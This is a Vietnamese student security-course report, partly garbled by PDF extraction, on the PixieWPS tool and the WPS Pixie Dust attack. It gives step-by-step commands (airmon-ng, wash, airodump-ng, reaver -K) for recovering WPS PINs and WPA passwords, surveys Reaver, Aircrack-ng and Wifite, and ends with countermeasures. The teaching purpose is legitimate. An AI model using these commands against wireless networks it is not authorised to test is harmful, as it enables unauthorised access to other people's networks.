HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THƠNG TIN Học phần: An tồn mạng Bài báo cáo: Tìm hiểu cơng cụ PixieWPS Kali Linux Giảng viên hướng dẫn: TS Đặng Minh Tuấn Sinh viên thực hiện: Ngơ Sỹ Hồng Mã sinh viên: B18DCAT098 Nhóm lớp: 02 Tổ thực hành: 01 Hà Nội 2021 Mục lục DANH SÁCH CÁC THUẬT NGỮ TIẾNG ANH VÀ VIẾT TẮT Từ viết tắt Thuật ngữ tiếng Anh/Giải thích WPS Wi-Fi Protected Setup WPAPSK Wi-Fi Protected Access PreShared Key (WPA-PSK) GNU GPL GNU General Public License FSF The Free Software Foundation BSD Berkeley Software Distribution MIT có nguồn gốc Viện Công nghệ Massachusetts (MIT) SSID Service Set Identifier NFC Near-Field Communications AP Access Point Thuật ngữ tiếng Việt/Giải thích Chuẩn an ninh mạng để tạo an toàn cho mạng khơng dây gia đình chế an ninh sử dụng để xác thực Validate người dùng mạng LAN không dây (WLAN) kết nối Wi-Fi Đây biến thể giao thức bảo mật WPA giấy phép phần mềm tự sử dụng rộng rãi, đảm bảo cho người dùng cuối tự chạy, nghiên cứu, sửa đổi chia sẻ phần mềm tổ chức phi lợi nhuận với sứ mệnh toàn giới nhằm thúc đẩy quyền tự người dùng máy tính giấy phép phần mềm miễn phí cho phép, áp đặt hạn chế tối thiểu việc sử dụng phân phối phần mềm bảo vệ giấy phép cấp phép, có hạn chế sử dụng lại tên mạng cục không dây (Wireless Local Area Network hay WLAN) bao gồm mạng WiFi gia đình cơng cộng công nghệ giao tiếp trường gần, sử dụng cảm ứng từ trường để thực kết nối thiết bị có tiếp xúc trực tiếp hay để gần Điểm truy cập hoạt động proxy nhà đăng ký người đăng ký WLAN Wireless Local Area Network mạng cho phép thiết bị kết nối giao tiếp không dây DANH MỤC CÁC HÌNH VẼ LỜI MỞ ĐẦU Bảo mật lĩnh vực mà ngành công nghệ thông tin quan tâm Khi Internet đời phát triển, nhu cầu trao đổi thông tin trở nên cần thiế Mục tiêu việc kết nối mạng giúp cho người sử dụng chung tài nguyên từ vị trí địa lý khác Cũng tài nguyên dễ dàng bị phân tán, dẫn đến việc chúng bị xâm phạm, gây mát liệu thơng tin có giá trị Bên cạnh giải pháp cụ thể an ninh bảo mật cho hệ thống để đảm bảo cho liệu, thông tin hệ thống doanh nghiệp an toàn từ truy cập trái phép từ bên lẫn bên doanh nghiệp Việc kiểm tra hệ thống CNTT bị công hay không cần thiết Để kiểm tra an tồn hệ thống, giả lập vụ công thử nghiệm Trong năm gần đây, Kali Linux hệ điều hành sử dụng nhiều chuyên gia đánh giá bảo mật tích hợp nhiều cơng cụ chun dụng giúp đánh giá an tồn hệ thống Trước việc cần thiết phải có môi trường để giải lập vụ công nhằm đành giá an toàn hệ thống mạng nên tơi chọn tìm hiểu cơng cụ Pixie WPS Kali Lnux để người hiểu sâu Wireless Attack Kali phiên tiến hóa hệ điều hành BackTrack, xuất vào năm 2013 có cải tiến so với BackTrack để đạt vị trí định cộng đồng bảo mật toàn giới Một vài đặc điểm bật Kali kể sau:  Kali phát triển tảng hệ điều hành Debian  Tính tương thích kiến trúc  Hỗ trợ mạng không dây tốt  Khả tùy biến cao  Dễ dàng nâng cấp phiên Kali tương lai Chương Khái quát công cụ Pixie WPS 1.1 Giới thiệu, lịch sử hình thành cơng cụ Pixie WPS PixieWPS cơng cụ tương đối có sẵn Kali Linux, nhắm đến lỗ hổng WPS Pixiewps cơng cụ viết C sử dụng để brute force ngoại tuyến WPS PIN ẩn khai thác entropy thấp không tồn số triển khai phần mềm giao thức WPS, gọi 'pixie dust attack' phát Dominique Bongard mùa hè năm 2014 Nó dành cho mục đích giáo dục Q trình giảm thời gian tìm mã PIN xác từ hàng xuống cịn vài phút vài giây Sau đó, mã PIN sử dụng để khôi phục WPA-PSK từ Access Point công cụ Reaver, Bully tham gia trực tiếp vào mạng không dây wpa_cli chương trình khác Kể từ phiên 1.4, khơi phục WPA-PSK từ q trình chụp thụ động hoàn toàn (từ M1 đến M7) cho số thiết bị (hiện số thiết bị hoạt động với mode 3) Phiên nhất: 1.4.2-5 Thời gian: 05-02-2021 Giấy phép: GNU GPLv3 Giấy phép Công cộng GNU (tiếng Anh: GNU General Public License, viết tắt GNU GPL hay GPL) giấy phép phần mềm tự sử dụng rộng rãi, đảm bảo cho người dùng cuối tự chạy, nghiên cứu, sửa đổi chia sẻ phần mềm Giấy phép ban đầu viết Richard Stallman Quỹ Phần mềm Tự (FSF) cho Dự án GNU, cấp cho người nhận chương trình máy tính quyền Định nghĩa Phần mềm Tự GPL giấy phép copyleft, có nghĩa tác phẩm phái sinh phân phối theo điều khoản cấp phép tương tự Đây phân biệt giấy phép phần mềm tự cho phép, giấy phép BSD Giấy phép MIT sử dụng rộng rãi ví dụ GPL giấy phép copyleft để sử dụng chung Trong lịch sử, gia đình giấy phép GPL giấy phép phần mềm phổ biến lĩnh vực phần mềm tự nguồn mở Các chương trình phần mềm miễn phí bật cấp phép theo GPL bao gồm nhân Linux Bộ biên dịch GNU (GCC) David A Wheeler cho copyleft cung cấp GPL quan trọng thành công hệ thống dựa Linux, giúp lập trình viên đóng góp cho hạt nhân đảm bảo công việc họ mang lại lợi ích cho tồn giới công ty phần mềm trả lại cho cộng đồng Trong năm 2007, phiên thứ ba giấy phép (GNU GPLv3) phát hành để giải số vấn đề nhận thức với phiên thứ hai (GNU GPLv2) phát trình sử dụng lâu dài Để giữ cho giấy phép cập nhật, giấy phép GPL bao gồm điều khoản "bất kỳ phiên sau" tùy chọn, cho phép người dùng lựa chọn điều khoản gốc điều khoản phiên FSF cập nhật Các nhà phát triển bỏ qua cấp phép phần mềm họ; ví dụ hạt nhân Linux cấp phép theo GPLv2 mà khơng có mệnh đề "bất kỳ phiên sau này" 1.2 WPS 1.2.1 Các phương pháp WPS Wi-Fi Protected Setup (WPS), phát triển Wi-Fi Alliance, giúp người dùng nhanh chóng dễ dàng định cấu hình bảo mật WPA / WPA2-Personal (PSK) định tuyến không dây máy khách WPS hỗ trợ hai phương pháp: Số thông tin cá nhân (PIN) Cấu hình nút đẩy (PBC) Đặc điểm kỹ thuật bao gồm phương pháp thứ ba, Giao tiếp trường gần (NFC) khơng có sản phẩm hỗ trợ NFC Phương thức mã PIN cho phép người dùng sử dụng mã PIN (được lấy từ nhãn dán hình tiện ích bảng điều khiển dựa web) nhập mã vào Điểm truy cập (AP) thiết bị WPS ứng dụng khách để kết nối Phương pháp bắt buộc tất thiết bị chứng nhận WPS Phương thức cấu hình nút nhấn (PBC) cho phép người dùng cần nhấn nút, thực tế ảo, hai thiết bị WPS để kết nối Đây phương pháp tùy chọn máy khách không dây Trong hai phương pháp, người dùng WPS không yêu cầu nhập tên mạng (SSID) bảo mật không dây tay Toàn hoạt động thường vài giây không vượt khoảng thời gian hai phút Phương thức WPS PIN (WPS PIN protocol) Định dạng WPS PIN: Người dùng lựa chọn PIN: PIN in nhãn dán: 1.2.2 Các thành phần WPS Có ba thành phần logic liên quan đến WPS:  Nhà đăng ký: thiết bị có quyền cấp thu hồi thơng tin xác thực mạng Một tổ chức đăng ký tên miền tích hợp vào điểm truy cập khơng dây (AP) tách biệt với AP  Người đăng ký: thiết bị tìm cách tham gia điểm truy cập mạng khơng dây máy tính xách tay, điện thoại di động…  AP: Access Point hoạt động proxy nhà đăng ký người đăng ký Giao diện E đặt cách hợp lý người đăng ký nhà đăng ký (về mặt vật lý, AP hoạt động proxy để truyền tải thơng báo) Mục đích giao diện E cho phép nhà đăng ký phát cấp thông tin đăng ký WLAN cho người đăng ký Giao diện M giao diện AP quan đăng ký Nó cho phép nhà đăng ký bên quản lý WPS AP WPS sử dụng giao thức để thiết lập giao diện Quản lý AP để cấp Thông tin xác thực cho thiết bị đăng ký Giao diện A nằm người đăng ký AP Chức giao diện A cho phép khám phá WPS WLAN cho phép giao tiếp người đăng ký người đăng ký IP 1.2.3 Giao thức đăng ký Giao thức đăng ký xác định trình bày tài liệu Wi-Fi Protected Setup Specification v1.0 Wi-Fi Alliance cung cấp Giao thức đăng ký thực mục đích sau:  Nó giúp khắc phục cố kết nối với kênh khơng dây  Nó cung cấp nhận dạng minh chứng người đăng ký cho nhà đăng ký người đăng ký cho người đăng ký cách sử dụng thơng tin ngồi băng tần, cho phép chức cấu hình thơng tin xác thực  Nó thiết lập vai trị thiết bị (AP, nhà đăng ký người đăng ký) 10 Bước 4: Chế độ giám sát service network-manager stop airmon-ng check Diệt quy trình gây nhiễu Làm điều lặp lặp lại cho tất trình kiểm tra airmon-ng cho kết đầu “không gây nhiễu” kill -9 Khởi động giao diện hình airmon-ng check iwconfig airmon-ng start wlan0 Đặt giao diện bạn vào chế độ hình cách sử dụng ‘airmon-ng start {wireless interface}’ 20 Kiểm tra danh sách mạng khơng dây tương thích với Kali Linux bạn Để cơng, cần sử dụng điều hợp mạng khơng dây tương thích Xem danh sách năm 2017 điều hợp mạng không dây tương thích Kali Linux Backtrack liên kết bạn lấy điều hợp phổ biến dành cho người bắt đầu Bước 5: Tìm mục tiêu Cách dễ để tìm mục tiêu có bật WPS Thu thập BSSID kênh # cho định tuyến bạn muốn cơng Đảm bảo bạn có tín hiệu mạnh trước thực công wash -i {monitor-interface} 21 Hoặc sử dụng Airodump Airodump kết xuất gói nhận giao diện hình Chúng ta chọn ghi hay khơng ghi gói vào tệp airodump-ng wlan0mon Việc thực thi Airodump thực biến thiết bị đầu cuối thành thiết bị đầu cuối cập nhật hiển thị tất thông tin Lưu ý BSSID mục tiêu, kênh & ESSID Nhấn Control + c để dừng airodump Bước 6: Tấn cơng Khi bạn có tất thơng tin, cần nhập lệnh sau: reaver -i wlan0mon -b -c -K -vv 22 Bước 7: Thành Đây mật khẩu! Một lần nữa, công không hoạt động với tất định tuyến, chắn hiệu công brute force (Pixie Dust: tối đa 30 phút so với Brute Force: từ phút tới NGÀY!) 23 Ở bạn có cụm mật mã PIN Vì vậy, cơng kết hợp Ngoại tuyến - Trực tuyến thực chống lại điểm truy cập không dây kiểm tra Thâm nhập không dây Điều thú vị PixieWPS tìm nhiều thơng tin khác số model AP, nhà sản xuất, v.v Vì vậy, trình kiểm tra, người ta sử dụng điều để tìm kiếm lỗ hổng phổ biến AP cụ thể 3.2 Demo sudo apt-get update 24 sudo apt-get install build-essential + sudo apt-get install libpcap-dev sudo apt-get install sqlite3 + sudo apt-get install libsqlite3-dev 25 sudo apt-get install pixiewps + git clone https://github.com/t6x/reaver-wps-fork-t6 26 make + make install 27 airmon-ng start wlan0 airmon-ng check kill 28 airodump-ng mon0 airodump-ng wlan0 wash -I mon0 29 reaver -i mon0 -b D8:EB:97:13:BF:D9 -c 10 -vvv -K -f 30 31 Chương Một số công cụ hack wifi khác 4.1 Reaver Số Top 10 công cụ hack Wifi Reaver Reaver công cụ phổ biến khác để hack mạng không dây nhắm mục tiêu lỗ hổng WPS cụ thể Reaver thực công vũ phu chống lại mã PIN đăng ký Thiết lập bảo vệ Wifi (WPS) để khôi phục mật WPA / WPA2 Do nhiều nhà sản xuất định tuyến ISP bật WPS theo mặc định, nhiều định tuyến dễ bị công Để sử dụng Reaver, bạn cần có cường độ tín hiệu tốt cho định tuyến khơng dây với cấu hình phù hợp Trung bình Reaver khơi phục cụm mật từ định tuyến dễ bị tổn thương 4-10 giờ, tùy thuộc vào điểm truy cập, cường độ tín hiệu mã PIN bị tắt Theo thống kê, bạn có 50% hội để bẻ khóa mã PIN WPS nửa thời gian 4.2 Aircrack-ng Aircrack cơng cụ phổ biến để bẻ khóa WEP / WPA / WPA2 Bộ Aircrack-ng chứa công cụ để chụp gói bắt tay, xác thực máy khách kết nối tạo lưu lượng truy cập công cụ để thực công từ điển từ điển Aicrack-ng cơng cụ tất có chứa công cụ sau (trong số công cụ khác): - Aircrack-ng để bẻ khóa mật khơng dây - Aireplay-ng để tạo lưu lượng truy cập xác thực ứng dụng khách - Airodump-ng để chụp gói - Airbase- ng để cấu hình điểm truy cập giả mạo 4.3 Wifite Wifite công cụ tự động để cơng nhiều mạng khơng dây mã hóa WEP / WPA / WPA2 WPS Bắt đầu Wifite yêu cầu vài tham số để hoạt động Wifite làm tất cơng việc khó khăn Nó bắt tay WPA, tự động giải mã máy khách kết nối, giả mạo địa MAC bạn bẻ khóa bảo vệ mật Chương Biện pháp phịng chống 32 Tắt WPS: Phân tích xem liệu AP WiFi bạn có cần sử dụng WPS hay không Tăng thời gian chờ: Đối với định tuyến nâng cao, chúng tơi tăng thời gian chờ Receive để làm chậm công Khóa WPS: Đặt thời gian Khóa WPS thành giá trị lớn Bảo mật vật lý cho Bộ định tuyến Kết luận Pixiewps biên dịch cho nhiều tảng khác Trên Windows, biên dịch MinGW Đảm bảo cài đặt hỗ trợ phtread Kể từ phiên 1.4.1, đưa vào kho lưu trữ thức OpenWrt LEDE Kể từ lần phát hành pixiewps cải thiện nhiều, thật khó để theo dõi thiết bị thị trường  Một phần mã lấy cảm hứng từ Bully Brian Purcell  Thư viện tiền điện tử bignum lấy từ LibTomCrypt TomsFastMath  Phát chuyển đổi endianness từ rofl0r / endianness.h Pixiewps cơng cụ dùng tìm kiếm nhiều thứ công cụ công vào wifi Chắc chặn bạn biết thêm nhiều thông tin wifi xung quanh chỗ bạn Tuy nhiên bạn phải khoản chi phí để mua mạng khơng dây tương thích với Kali Linux để sử dụng Pixiewps biên dịch cài đặt nhiều tảng bao gồm openWRT Android Tài liệu tham khảo [1] [2] [3] wiire, “Pixiewps: wps pixie dust attack tool” [Online] Available: https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attacktool [Accessed: 28-Nov-2021] Wikipedia, “Wi-Fi Protected Setup” [Online] Available: https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup [Accessed: 28-Nov-2021] soxrok2212, “WPS Pixie Dust Attack (Offline WPS Attack)” [Online] Available: 33 https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(OfflineWPS-Attack) [Accessed: 28-Nov-2021] [4] wiire, “pixiewps” [Online] Available: https://github.com/wiire-a/pixiewps.[Accessed: 28-Nov-2021] [5] burnct, “Hack WiFi Using a WPS Pixie Dust Attack” [Online] Available: https://null-byte.wonderhowto.com/how-to/hack-wifi-using-wps-pixie-dust-attack0162671/ [Accessed: 28-Nov-2021] [6] Hamed Mohtadi, Alireza Rahimi, “New attacks on Wi-Fi Protected Setup” [Online] Available: https://d1wqtxts1xzle7.cloudfront.net/38996329/ACSIJ-20154-5-850-with-cover-page-v2.pdf, September 2015 34 ... giá trị Bên cạnh giải pháp cụ thể an ninh bảo mật cho hệ thống để đảm bảo cho liệu, thông tin hệ thống doanh nghiệp an toàn từ truy cập trái phép từ bên lẫn bên doanh nghiệp Việc kiểm tra hệ thống... người đăng ký WLAN Wireless Local Area Network mạng cho phép thiết bị kết nối giao tiếp không dây DANH MỤC CÁC HÌNH VẼ LỜI MỞ ĐẦU Bảo mật lĩnh vực mà ngành công nghệ thông tin quan tâm Khi Internet... cấp thông tin đăng ký WLAN cho người đăng ký Giao diện M giao diện AP quan đăng ký Nó cho phép nhà đăng ký bên quản lý WPS AP WPS sử dụng giao thức để thiết lập giao diện Quản lý AP để cấp Thông